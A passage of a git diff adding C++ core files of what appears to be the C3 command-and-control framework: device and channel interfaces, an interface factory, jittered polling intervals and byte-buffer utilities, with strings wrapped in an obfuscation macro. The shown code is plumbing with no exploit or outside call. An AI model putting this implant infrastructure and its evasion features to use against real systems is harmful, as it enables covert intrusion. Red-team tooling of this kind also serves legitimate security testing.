MWR::C3::Device::SetUpdateFrequency(std::chrono::milliseconds minUpdateFrequencyInMs, std::chrono::milliseconds maxUpdateFrequencyInMs) +{ + // Sanity checks. + if (minUpdateFrequencyInMs > maxUpdateFrequencyInMs) + throw std::invalid_argument{ OBF("maxUpdateFrequency must be greater or equal to minUpdateFrequency.") }; + if (minUpdateFrequencyInMs < 30ms) + throw std::invalid_argument{ OBF("minUpdateFrequency must be greater or equal to 30ms.") }; + + std::lock_guard guard(m_UpdateFrequencyMutex); + m_MinUpdateFrequency = minUpdateFrequencyInMs; + m_MaxUpdateFrequency = maxUpdateFrequencyInMs; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Device::SetUpdateFrequency(std::chrono::milliseconds frequencyInMs) +{ + std::lock_guard guard(m_UpdateFrequencyMutex); + m_MinUpdateFrequency = frequencyInMs; + m_MaxUpdateFrequency = m_MinUpdateFrequency; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::chrono::milliseconds MWR::C3::Device::GetUpdateFrequency() const +{ + std::lock_guard guard(m_UpdateFrequencyMutex); + return m_MinUpdateFrequency != m_MaxUpdateFrequency ? MWR::Utils::GenerateRandomValue(m_MinUpdateFrequency, m_MaxUpdateFrequency) : m_MinUpdateFrequency; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Device::OnRunCommand(ByteView command) +{ + switch (command.Read()) + { + case static_cast(MWR::C3::Core::Relay::Command::Close): + return Close(), ByteVector{}; + case static_cast(MWR::C3::Core::Relay::Command::UpdateJitter) : + { + auto [minVal, maxVal] = command.Read(); + return SetUpdateFrequency(MWR::Utils::ToMilliseconds(minVal), MWR::Utils::ToMilliseconds(maxVal)), ByteVector{}; + } + default: + throw std::runtime_error(OBF("Device received an unknown command")); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::AbstractConnector::OnRunCommand(ByteView command) +{ + switch (command.Read()) + { + case static_cast(-1) : + return TurnOff(), ByteVector{}; + default: + throw std::runtime_error(OBF("AbstractConnector received an unknown command")); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Device::Close() // Closing mechanism was not originaly ment for device itself. It must call relay methods to remove itself. New mechanism that does not need to know relay must be introduced. +{ + auto bridge = std::static_pointer_cast(GetBridge()); + auto relay = std::static_pointer_cast(bridge->GetRelay()); + relay->DetachDevice(bridge->GetDid()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::AbstractConnector::TurnOff() +{ + auto bridge = std::static_pointer_cast(GetBridge()); + auto gateway = std::static_pointer_cast(bridge->GetGateRelay()); + gateway->TurnOffConnector(bridge->GetNameHash()); +} diff --git a/Src/Common/MWR/C3/Internals/Interface.h b/Src/Common/MWR/C3/Internals/Interface.h new file mode 100644 index 0000000..68981c4 --- /dev/null +++ b/Src/Common/MWR/C3/Internals/Interface.h @@ -0,0 +1,147 @@ +#pragma once + +#include "BackendCommons.h" + +namespace MWR::C3 +{ + template + struct Interface + { + /// Called by Relay just after Device creation. + /// @param bridge the Shell-Core bridge object bound to this Device. + virtual void OnAttach(std::shared_ptr const& bridge); + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return command result. + virtual ByteVector OnRunCommand(ByteView command); + + /// Tells Device's (dynamic) capability. + /// @return A buffer with Device's status and description. + virtual ByteVector OnWhoAmI() { return {}; } + + protected: + /// Logs a message. Used by internal mechanisms to report errors, warnings, information and debug messages. + /// @param message log entry to add. + virtual void Log(LogMessage const& message); + + /// Detaches from Relay (which leads to destruction of the Device). + virtual void Detach(); + + /// Shell-Core Bridge getter. + /// @return Bridge object if the Device is attached or null. + virtual std::shared_ptr GetBridge() const; + + private: + std::weak_ptr m_Bridge; ///< Shell-Core Bridge (PIMPL). + std::vector m_PreLog; ///< Before the Device gets connected to the Relay, this vector contains all the Log messages. + }; + + /// An abstract structure representing all Devices - Implants, Channels, etc. + struct Device : Interface, std::enable_shared_from_this + { + /// Callback periodically fired by Relay for Device to update itself. Might be called from a separate thread. The Device should perform all necessary actions and leave as soon as possible. + virtual void OnReceive() = 0; + + /// Called every time Relay wants to send a packet through this Channel Device. Should always be called from the same thread for every sender (so it would be safe to use thread_local vars). + /// @param blob buffer containing data to send. + /// @remarks this method is used only to pass internal (C3) packets through the C3 network, thus it won't be called for any other types of Devices than Channels. + virtual size_t OnSendToChannel(ByteView packet) = 0; + + /// Fired by Relay to pass by provided Command from Connector. + /// @param command full Command with arguments. + virtual void OnCommandFromConnector(ByteView command) = 0; + + /// Tells whether Device is a Channel or not. + /// @return true if Device is a Channel. + virtual bool IsChannel() const { return false; } + + /// Modifies the duration and jitter of OnReceive() calls. If minUpdateFrequencyInMs != maxUpdateFrequencyInMs then update frequency is randomized in range between those values. + /// @param minUpdateFrequencyInMs minimum update frequency. + /// @param maxUpdateFrequencyInMs maximum update frequency. + virtual void SetUpdateFrequency(std::chrono::milliseconds minUpdateFrequencyInMs, std::chrono::milliseconds maxUpdateFrequencyInMs); + + /// Sets time span between OnReceive() calls to a fixed value. + /// @param frequencyInMs frequency of OnReceive() calls. + virtual void SetUpdateFrequency(std::chrono::milliseconds frequencyInMs); + + /// Gets update frequency. If min and max variables have different values then generates random value in their range. + virtual std::chrono::milliseconds GetUpdateFrequency() const; + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return command result. + ByteVector OnRunCommand(ByteView command) override; + + protected: + /// Close device. + virtual void Close(); + + mutable std::mutex m_UpdateFrequencyMutex; ///< Mutex to synchronize changes in frequency update members. + std::chrono::milliseconds m_MinUpdateFrequency, m_MaxUpdateFrequency; ///< Receive loop moderator (if m_MaxUpdateFrequencyJitter != m_MinUpdateFrequency. then update frequency is randomized in range between those values). + }; + + /// An abstract structure representing all Channels. + struct AbstractChannel : Device + { + /// Callback that is periodically called for every Device to update itself. Might be called from a separate thread. The Device should perform all necessary actions and leave as soon as possible. + /// @return ByteVector that contains a single packet retrieved from Channel. + virtual ByteVector OnReceiveFromChannel() = 0; + + /// Tells that this Device type is a Channel. + bool IsChannel() const override { return true; } + + private: + /// Callback periodically fired by Relay for Device to update itself. Might be called from a separate thread. The Device should perform all necessary actions and leave as soon as possible. + void OnReceive() override final; + + /// Fired by Relay to pass by provided Command from Connector, which is illegal for Channels (and that's why this method unconditionally throws std::logic_error). + /// @throw This method unconditionally throws std::logic_error. + void OnCommandFromConnector(ByteView) override final + { + throw std::logic_error{ OBF("Received a Command from a Connector sent to a Channel.") }; + } + }; + + /// An abstract structure representing all Peripherals. + struct AbstractPeripheral : Device + { + /// Callback that is periodically called for every Device to update itself. Might be called from a separate thread. The Device should perform all necessary actions and leave as soon as possible. + /// @return ByteVector that contains a single Command retrieved from Peripheral. + virtual ByteVector OnReceiveFromPeripheral() = 0; + + private: + /// Callback periodically fired by Relay for Device to update itself. Might be called from a separate thread. The Device should perform all necessary actions and leave as soon as possible. + void OnReceive() override final; + + /// This method unconditionally throws std::logic_error as calling it is illegal (Peripherals are not a Channels). @see DeviceDevice::OnSendToChannel. + /// @throw This method unconditionally throws std::logic_error. + size_t OnSendToChannel(ByteView) override final + { + throw std::logic_error{ OBF("Tried to send a C3 packet through a Peripheral.") }; + } + }; + + /// Abstract base for all Connectors. + struct AbstractConnector : Interface, std::enable_shared_from_this + { + /// Fired by Relay to pass by provided Command from Binder Peripheral. + /// @param binderId Identifier of Peripheral who sends the Command. + /// @param command full Command with arguments. + virtual void OnCommandFromBinder(ByteView binderId, ByteView command) = 0; + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return command result. + ByteVector OnRunCommand(ByteView command) override; + + virtual ByteVector PeripheralCreationCommand(ByteView connectionId, ByteView data, bool isX64) { return data; } + + protected: + /// Close Connector. + virtual void TurnOff(); + }; +} + +// Include template's implementation. +#include "Interface.hxx" diff --git a/Src/Common/MWR/C3/Internals/Interface.hxx b/Src/Common/MWR/C3/Internals/Interface.hxx new file mode 100644 index 0000000..808df0e --- /dev/null +++ b/Src/Common/MWR/C3/Internals/Interface.hxx @@ -0,0 +1,52 @@ +#pragma once + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +template +void MWR::C3::Interface::OnAttach(std::shared_ptr const& bridge) +{ + // Store relay pointer. + m_Bridge = bridge; + + // Pass all previously stored messages to the Relay. + for (auto& element : m_PreLog) + bridge->Log(element); + + // Release internal buffer to save memory. + std::vector().swap(m_PreLog); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +template +void MWR::C3::Interface::Log(LogMessage const& message) +{ + // If Relay is already connected then forward this call. Otherwise store messages internally until we get connected. + if (auto bridge = GetBridge()) + bridge->Log(message); + else + m_PreLog.push_back(message); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +template +void MWR::C3::Interface::Detach() +{ + if (auto bridge = GetBridge()) + { + bridge->Detach(); + m_Bridge.reset(); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +template +MWR::ByteVector MWR::C3::Interface::OnRunCommand(ByteView command) +{ + throw std::logic_error{ OBF("This Device doesn't support any Commands.") }; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +template +std::shared_ptr MWR::C3::Interface::GetBridge() const +{ + return m_Bridge.lock(); +} diff --git a/Src/Common/MWR/C3/Internals/InterfaceFactory.cpp b/Src/Common/MWR/C3/Internals/InterfaceFactory.cpp new file mode 100644 index 0000000..f6e0542 --- /dev/null +++ b/Src/Common/MWR/C3/Internals/InterfaceFactory.cpp @@ -0,0 +1,51 @@ +#include "Stdafx.h" +#include "InterfaceFactory.h" +#include "Common/json/json.hpp" + +using json = nlohmann::json; + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::InterfaceFactory& MWR::C3::InterfaceFactory::Instance() +{ + static auto instance = InterfaceFactory{}; + return instance; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::string MWR::C3::InterfaceFactory::GetCapability() +{ + json retValue; + auto populate = [&](auto* typePtr, std::string name) + { + for (auto& e : GetMap>()) + { + try + { + json entry; + entry["type"] = e.first; + if (e.second.m_Capability.empty() || e.second.m_Name.empty()) + continue; + + entry["name"] = e.second.m_Name; + auto pin = json::parse(e.second.m_Capability); + for (const auto& j : pin.items()) + entry[j.key()] = j.value(); + + retValue[name].push_back(entry); + } + catch (std::exception& except) // log is not available in interfaceFactory, + { + std::cout << OBF("Caught std::excpetion when parsing: ") << e.second.m_Name << OBF(". Interface will be unavailable.\n") << except.what() << std::endl; + } + catch (...) + { + std::cout << OBF("Caught unknown exception when parsing: ") << e.second.m_Name << OBF(". Interface will be unavailable.\n") << std::endl; + } + } + }; + + populate((AbstractChannel*)nullptr, OBF("channels")); + populate((AbstractConnector*)nullptr, OBF("connectors")); + populate((AbstractPeripheral*)nullptr, OBF("peripherals")); + return retValue.dump(4); +} diff --git a/Src/Common/MWR/C3/Internals/InterfaceFactory.h b/Src/Common/MWR/C3/Internals/InterfaceFactory.h new file mode 100644 index 0000000..39d0a9a --- /dev/null +++ b/Src/Common/MWR/C3/Internals/InterfaceFactory.h @@ -0,0 +1,135 @@ +#pragma once + +#include "Common/MWR/CppTools/Hash.h" +#include "Interface.h" + +namespace MWR::C3 +{ + /// Singleton class allowing registration and access to functors creating new Interface. + class InterfaceFactory + { + public: + /// Get reference to singleton object of InterfaceFactory. + static InterfaceFactory& Instance(); + + /// Callable type creating new Interface. + template + using Builder = std::function(ByteView)>; + + /// Type with all information about interface. + template + struct InterfaceData + { + Builder m_Builder; + std::string m_Name; + std::string m_Capability; + HashT m_ClousureConnectorHash; + std::pair m_StartupJitter; + }; + + /// Register Interface builder in factory. + /// @param hash. Used as a key for registration. + /// @param data. All informations about interface.. + template + bool Register(HashT hash, InterfaceData data) + { + return GetMap().emplace(hash, std::move(data)).second; // second of pair of iterator and emplace result. + } + + /// Return information about Interface for required hash. + /// @param hash. Used as a key for registration. + /// @return Interface information if found or nullptr otherwise. + template + InterfaceData const* GetInterfaceData(HashT hash) + { + try + { + return &Find(hash)->second; + } + catch (...) + { + return nullptr; + } + } + + /// Find iterator to object associated to interface hash. + /// @param hash. Used as a key for registration. + /// @throws if interface was not registered. + /// @return iterator to internal storage. + template or std::is_same_v or std::is_same_v, int> = 0> + auto Find(HashT hash) + { + auto it = GetMap().find(hash); + if (it == GetMap().end()) + throw std::runtime_error{ OBF("Requested Device was not registered: ") + std::to_string(hash) }; + + return it; + } + + /// Find iterator to object associated to interface name. + /// @param name Interface name + /// @return hash of the Interface name. + template or std::is_same_v or std::is_same_v, int> = 0> + HashT Find(std::string_view name) + { + for (auto iterator = GetMap().begin(); iterator != GetMap().end(); ++iterator) + if (iterator->second.m_Name == name) + return iterator.first; + + return 0; + } + + /// Get proper map member for type T. + template auto& GetMap() { static_assert(false, "Template type not supported."); } + template <> auto& GetMap() { return m_Channels; } + template <> auto& GetMap() { return m_Peripherals; } + template <> auto& GetMap() { return m_Connectors; } + + /// Return json string with capability; + std::string GetCapability(); + + private: + /// Private constructor. + /// Only object of InterfaceFactory singleton must be accessed by Instance method. + InterfaceFactory() = default; + + /// Separated maps for each interface type. + std::unordered_map> m_Channels; + std::unordered_map> m_Peripherals; + std::unordered_map> m_Connectors; + }; + + /// Use typeid to get text interface name. + /// @return std::string interface name. + template + std::string GetInterfaceName() + { +# ifndef _MSC_VER + static_assert(false, "Current implementation supports only MSVC."); +# endif + + std::string_view fullName = __FUNCSIG__; + std::string InterfaceMask = OBF("::Interfaces::"); + + size_t offset; + if ((offset = fullName.rfind(InterfaceMask)) == std::string::npos) + throw std::logic_error{ OBF("Cannot generate interface name.") }; + + offset += InterfaceMask.size(); + + // Remove Channels:: / Implants:: + if ((offset = fullName.find(OBF("::"), offset)) == std::string::npos) + throw std::logic_error{ OBF("Cannot generate interface name.") }; + + auto retVal = std::string{ fullName.substr(offset + "::"sv.size()) }; + + if ((offset = retVal.rfind('>')) == std::string::npos) + throw std::logic_error{ OBF("Cannot generate interface name.") }; + + retVal = retVal.substr(0, offset); + while ((offset = retVal.find(OBF("::"))) != std::string::npos) + retVal.erase(offset, 1); + + return retVal; + } +} diff --git a/Src/Common/MWR/C3/PrecompiledHeader.hpp b/Src/Common/MWR/C3/PrecompiledHeader.hpp new file mode 100644 index 0000000..e721b50 --- /dev/null +++ b/Src/Common/MWR/C3/PrecompiledHeader.hpp @@ -0,0 +1,11 @@ +#pragma once + +// Standard library includes. +#include //< C++ standard time library. +#include + +// Literals. +using namespace std::chrono_literals; + +// C3 Precompiled header. +#include "Common/MWR/PrecompiledHeader.hpp" //< CppCommons PCH. diff --git a/Src/Common/MWR/C3/Sdk.hpp b/Src/Common/MWR/C3/Sdk.hpp new file mode 100644 index 0000000..d99d818 --- /dev/null +++ b/Src/Common/MWR/C3/Sdk.hpp @@ -0,0 +1,20 @@ +#pragma once + +#include "PrecompiledHeader.hpp" //< C3 Precompiled headers (if they weren't included in StdAfx.h) +#include "Internals/BackendCommons.h" //< C3 back-back-end and C3 front-back-end common types and functions. +#include "Internals/AutomaticRegistrator.h" //< For auto registering Interface factories. + +// C3 Core static library. +#ifdef _WIN64 +# ifdef _DEBUG +# pragma comment(lib, "../Bin/Core_d64.lib") +# else +# pragma comment(lib, "../Bin/Core_r64.lib") +# endif +#else +# ifdef _DEBUG +# pragma comment(lib, "../Bin/Core_d86.lib") +# else +# pragma comment(lib, "../Bin/Core_r86.lib") +# endif +#endif diff --git a/Src/Common/MWR/CppTools/ByteArray.h b/Src/Common/MWR/CppTools/ByteArray.h new file mode 100644 index 0000000..bae1908 --- /dev/null +++ b/Src/Common/MWR/CppTools/ByteArray.h @@ -0,0 +1,15 @@ +#pragma once + +namespace MWR +{ + // TODO own implementation would allow easier casting. Implicit cast to ByteView, and then to desired type is forbidden. + /// Owning container with size known at compilation time. + template + using ByteArray = std::array; + + /// Idiom for detecting tuple ByteArray. + template + constexpr bool IsByteArray = false; + template + constexpr bool IsByteArray> = true; +} \ No newline at end of file diff --git a/Src/Common/MWR/CppTools/ByteVector.cpp b/Src/Common/MWR/CppTools/ByteVector.cpp new file mode 100644 index 0000000..376fc23 --- /dev/null +++ b/Src/Common/MWR/CppTools/ByteVector.cpp @@ -0,0 +1,75 @@ +#include "StdAfx.h" +#include "ByteVector.h" + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector::ByteVector(ByteVector const& other) + : Super(static_cast(other)) +{ + +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector::ByteVector(ByteVector&& other) + : Super(static_cast(other)) +{ + +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector::ByteVector(std::vector other) + : Super(std::move(other)) +{ + +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector& MWR::ByteVector::operator=(ByteVector const& other) +{ + auto tmp = Super{ static_cast(other) }; + std::swap(static_cast(*this), tmp); + return *this; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector& MWR::ByteVector::operator=(ByteVector&& other) +{ + std::swap(static_cast(*this), static_cast(other)); + return *this; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::operator==(ByteVector const& lhs, ByteVector const& rhs) +{ + if (lhs.size() != rhs.size()) + return false; + + for (size_t i = 0; i < lhs.size(); ++i) + if (lhs[i] != rhs[i]) + return false; + + return true; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::operator!=(ByteVector const& lhs, ByteVector const& rhs) +{ + return !(lhs == rhs); +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Literals::operator "" _b(const char* data, size_t size) +{ + MWR::ByteVector ret; + ret.resize(size); + std::memcpy(ret.data(), data, size); + return ret; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Literals::operator "" _b(const wchar_t* data, size_t size) +{ + MWR::ByteVector ret; + ret.resize(size * sizeof(wchar_t)); + std::memcpy(ret.data(), data, size * sizeof(wchar_t)); + return ret; +} diff --git a/Src/Common/MWR/CppTools/ByteVector.h b/Src/Common/MWR/CppTools/ByteVector.h new file mode 100644 index 0000000..86db390 --- /dev/null +++ b/Src/Common/MWR/CppTools/ByteVector.h @@ -0,0 +1,258 @@ +#pragma once + +#include "ByteArray.h" + +// TODO Examine forwarding pattern in Write methods. +namespace MWR +{ + // forward declaration + class ByteView; + + /// Idiom for detecting tuple types. + template + constexpr bool IsTuple = false; + template + constexpr bool IsTuple> = true; + + /// An owning container. + class ByteVector : std::vector + { + public: + /// Privately inherited Type. + using Super = std::vector; + + /// Type of stored values. + using ValueType = Super::value_type; + + /// Copy constructor. + /// @param other. Object to copy. + ByteVector(ByteVector const& other); + + /// Move constructor. + /// @param other. Object to move. + ByteVector(ByteVector&& other); + + /// Copy assignment operator. + /// @param other. Object to copy. + ByteVector& operator=(ByteVector const& other); + + /// Move assignment operator. + /// @param other. Object to move. + ByteVector& operator=(ByteVector&& other); + + /// Create from std::vector. + /// @param other. Object to copy. + ByteVector(std::vector other); + + /// Write all arguments at the end of ByteVector. + /// @tparam T. Parameter pack to be written. Types are deduced from function call. + /// @return itself to allow chaining. + /// @remarks This function is called only for two or more arguments. + /// @remarks Each type in parameter pack must have corresponding Write method for one argument. + template 1), int> = 0> + ByteVector& Write(T... args) + { + VariadicWriter::Write(*this, args...); + return *this; + } + + /// Concat content of of provided object + /// @tparam T. Type to be stored. T must be a ContiguousContainer and have T::data(), T::size(), T::value_type + /// @return itself to allow chaining. + template + ByteVector & Concat(T arg) + { + auto oldSize = size(); + resize(oldSize + arg.size() * sizeof(T::value_type)); + std::memcpy(data() + oldSize, arg.data(), arg.size() * sizeof(T::value_type)); + + return *this; + } + + /// Write content of of provided object prefixed with four byte size. + /// @tparam T. Type to be stored. Supported types are ByteVector, ByteView, std::string, std::string_view, std::wstring, std::wstring_view. + /// @return itself to allow chaining. + template + || std::is_same_v + || std::is_same_v + || std::is_same_v + || std::is_same_v + || std::is_same_v + ), int> = 0> + ByteVector& Write(T arg) + { + auto oldSize = size(); + resize(oldSize + sizeof(uint32_t) + arg.size() * sizeof(T::value_type)); + *reinterpret_cast(data() + oldSize) = static_cast(arg.size()); + std::memcpy(data() + oldSize + sizeof(uint32_t), arg.data(), arg.size() * sizeof(T::value_type)); + + return *this; + } + + /// Write content of array. Size must be known at compile time and will not be saved in data. + /// @tparam T. Type to be stored. Supported types are ByteArray. + /// @return itself to allow chaining. + template, int> = 0> + ByteVector& Write(T arg) + { + auto oldSize = size(); + resize(oldSize + arg.size()); + std::memcpy(data() + oldSize, arg.data(), arg.size()); + + return *this; + } + + /// Write arithmetic type. + /// tparam T. Type to be stored. + /// @return itself to allow chaining. + template::value, int> = 0> + ByteVector & Write(T arg) + { + auto oldSize = size(); + resize(oldSize + sizeof(T)); + *reinterpret_cast(data() + oldSize) = arg; + + return *this; + } + + /// Write tuple type. + /// tparam T. Tuple type to be stored. + /// @return itself to allow chaining. + template, int> = 0> + ByteVector & Write(T arg) + { + Writer::Write(*this, arg); + + return *this; + } + + // Enable methods. + using Super::vector; + using Super::value_type; + using Super::allocator_type; + using Super::size_type; + using Super::difference_type; + using Super::reference; + using Super::const_reference; + using Super::pointer; + using Super::const_pointer; + using Super::iterator; + using Super::const_iterator; + using Super::reverse_iterator; + using Super::const_reverse_iterator; + using Super::operator=; + using Super::assign; + using Super::get_allocator; + using Super::at; + using Super::operator[]; + using Super::front; + using Super::back; + using Super::data; + using Super::begin; + using Super::cbegin; + using Super::end; + using Super::cend; + using Super::rbegin; + using Super::crbegin; + using Super::rend; + using Super::crend; + using Super::empty; + using Super::size; + using Super::max_size; + using Super::reserve; + using Super::capacity; + using Super::shrink_to_fit; + using Super::clear; + using Super::insert; + using Super::emplace; + using Super::erase; + using Super::push_back; + using Super::emplace_back; + using Super::pop_back; + using Super::resize; + + private: + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// @tparam T. First type from parameter pack. Each recursive call will unfold one type. + /// @tparam Rest. Parameter pack storing rest of provided types. + template + struct VariadicWriter + { + /// Function responsible for recursively packing data to ByteVector. + /// @param self. Reference to ByteVector object using VariadicWriter. + static void Write(ByteVector& self, T current, Rest... rest) + { + self.Write(current); + VariadicWriter::Write(self, rest...); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// Closure specialization. + /// @tparam T. Type to be extracted stored in ByteVector. + template + struct VariadicWriter + { + /// Function responsible for recursively packing data to ByteVector. + /// @param self. Reference to ByteVector object using VariadicWriter. + static void Write(ByteVector& self, T current) + { + self.Write(current); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// @tparam T. Tuple type to write. + /// @tparam N. How many elements of tuple to write. + template > + struct Writer + { + /// Function responsible for recursively packing data to ByteVector. + /// @param self. Reference to ByteVector object using VariadicWriter. + /// @param t. reference to tuple. + static auto Write(ByteVector& self, T const& t) + { + self.Write(std::get -N>(t)); + Writer::Write(self, t); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// Closure specialization. + /// @tparam T. Tuple type to write. + template + struct Writer + { + /// Closing function, does nothing. + static void Write(ByteVector&, T const&) + { + + } + }; + }; + + /// Checks if the contents of lhs and rhs are equal. + /// @param lhs. Left hand side of operator. + /// @param rhs. Right hand side of operator. + bool operator==(ByteVector const& lhs, ByteVector const& rhs); + + /// Checks if the contents of lhs and rhs are equal. + /// @param lhs. Left hand side of operator. + /// @param rhs. Right hand side of operator. + bool operator!=(ByteVector const& lhs, ByteVector const& rhs); + + namespace Literals + { + /// Create ByteVector with syntax ""_bvec + ByteVector operator "" _b(const char* data, size_t size); + + /// Create ByteVector with syntax L""_bvec + ByteVector operator "" _b(const wchar_t* data, size_t size); + } +} diff --git a/Src/Common/MWR/CppTools/ByteView.cpp b/Src/Common/MWR/CppTools/ByteView.cpp new file mode 100644 index 0000000..cd012f3 --- /dev/null +++ b/Src/Common/MWR/CppTools/ByteView.cpp @@ -0,0 +1,88 @@ +#include "StdAfx.h" +#include "ByteView.h" + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::vector MWR::SplitAndCopy(std::string_view stringToBeSplitted, std::string_view delimiter) +{ + return Split(stringToBeSplitted, delimiter); +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::ByteView(ByteVector const& data, size_t offset) + : Super([&]() { return data.size() >= offset ? data.data() + offset : throw std::out_of_range{ OBF("Out of range. Data size: ") + std::to_string(data.size()) + OBF(" offset: ") + std::to_string(offset) }; }(), data.size() - offset) +{ + +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::ByteView(ByteVector::const_iterator begin, ByteVector::const_iterator end) + : Super([&]() { return end >= begin ? begin._Ptr : throw std::out_of_range{ OBF("Out of range by: ") + std::to_string(begin - end) + OBF(" elements.") }; }(), static_cast(end - begin)) +{ + +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::ByteView(std::basic_string_view basicSring) + : Super(basicSring) +{ + +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::ByteView(std::string_view data) + : Super{ reinterpret_cast(data.data()), data.size() } +{ +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::operator MWR::ByteView::Super() const noexcept +{ + return Super{ data(), size() }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::operator MWR::ByteVector() const +{ + return { begin(), end() }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::operator std::string() const +{ + return { reinterpret_cast(data()), size() }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView::operator std::string_view() const +{ + return { reinterpret_cast(data()), size() }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::ByteView::Read(size_t byteCount) +{ + if (byteCount > size()) + throw std::out_of_range{ OBF(": Size: ") + std::to_string(size()) + OBF(". Cannot read ") + std::to_string(byteCount) + OBF(" bytes.") }; + + auto retVal = ByteVector{ begin(), begin() + byteCount }; + remove_prefix(byteCount); + return retVal; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::ByteView::SubString(const size_type offset, size_type count) const +{ + return Super::substr(offset, count); +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::Literals::operator "" _bv(const char* data, size_t size) +{ + return { reinterpret_cast(data), size }; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::Literals::operator "" _bv(const wchar_t* data, size_t size) +{ + return { reinterpret_cast(data), size * sizeof(wchar_t) }; +} diff --git a/Src/Common/MWR/CppTools/ByteView.h b/Src/Common/MWR/CppTools/ByteView.h new file mode 100644 index 0000000..29c4e2f --- /dev/null +++ b/Src/Common/MWR/CppTools/ByteView.h @@ -0,0 +1,331 @@ +#pragma once + +#include "ByteVector.h" + +namespace MWR +{ + /// Function splitting string. + /// + /// @tparam copy. Indicates should strings be copied. + /// @param stringToBeSplitted initial string to be tokenized. + /// @param delimiter to be searched in string. + /// @throws std::runtime_error if delimiter empty or greatter equal to stringToBeSplitted + /// @returns std::vector or std::vector depending on copy flag. + template + std::vector> Split(std::string_view stringToBeSplitted, std::string_view delimiter) + { + if (delimiter.empty() && delimiter.size() >= stringToBeSplitted.size()) + throw std::runtime_error{ OBF("Delimiter size is incorrect") }; + + using ReturnType = decltype(Split(stringToBeSplitted, delimiter)); + ReturnType splittedString; + // startIndex can overflow, endIndex is checked first, and lazy check on startIndex will avoid last empty token. + for (size_t startIndex = 0u, endIndex = 0u; endIndex < stringToBeSplitted.size() && startIndex < 